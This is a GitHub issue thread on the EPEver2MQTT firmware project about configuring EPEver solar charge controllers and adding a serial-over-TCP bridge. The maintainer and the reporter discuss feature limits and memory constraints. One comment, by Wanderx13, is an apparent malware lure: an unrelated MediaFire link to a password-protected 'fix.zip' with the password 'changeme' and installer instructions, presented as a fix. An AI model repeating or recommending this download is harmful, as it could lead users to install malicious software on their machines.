softwarecrash/EPEver2MQTT #49: [HELP] Configuration of working parameters of epever (Solar Station Monitor)

miky2k, 2024-08-26:
### A clear and concise description of what the problem is.

I'm using five epever tracer and all of them is administered through a bridge (serialTCP) by  tasmota and linux host with  python  tcpmodbus client.
Sometimes i use in windows solar station monitor to change some parameters and i create  virtual com port with com2tcp.
I don't'  understand yif our firmware accept a connection to act as serialTCP bridge , or if is it possible to configure epever charge controller parameters from (webserial or HA interface).

Wanderx13, 2024-08-26:
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

softwarecrash, 2024-08-27:
actual only output control settings are supported 
https://github.com/softwarecrash/EPEver2MQTT/wiki/Output-Control

miky2k, 2024-08-27:
Add  access to serial stream  through tcp port is feasible ? For configuration purpose.

softwarecrash, 2024-08-27:
> Add access to serial stream through tcp port is feasible ? For configuration purpose.

not as simple as its sounds, detection is tcp brdige open-disable the workers or build a switching for it... the main problem is the tcp bridges librarys are all verry big and need a lot of cpu time, but the epever project is near the limits without loosing functions like webOTA and other. 
added it to ideas to check it later, at the moment i doenst have the time for it, must check if it makeable with the prog space

miky2k, 2024-09-02:
>  but the epever project is near the limits without loosing functions like webOTA and other. 

I use tasmota with tcpbridge,modubus,OTA,Webserver,MQTT, SSL and TLS and other peripherals stuff at same time in the same soc, i fell is not a problem of cpu or memory but choice optimized libraries.

closed 2024-10-17 by github-actions[bot]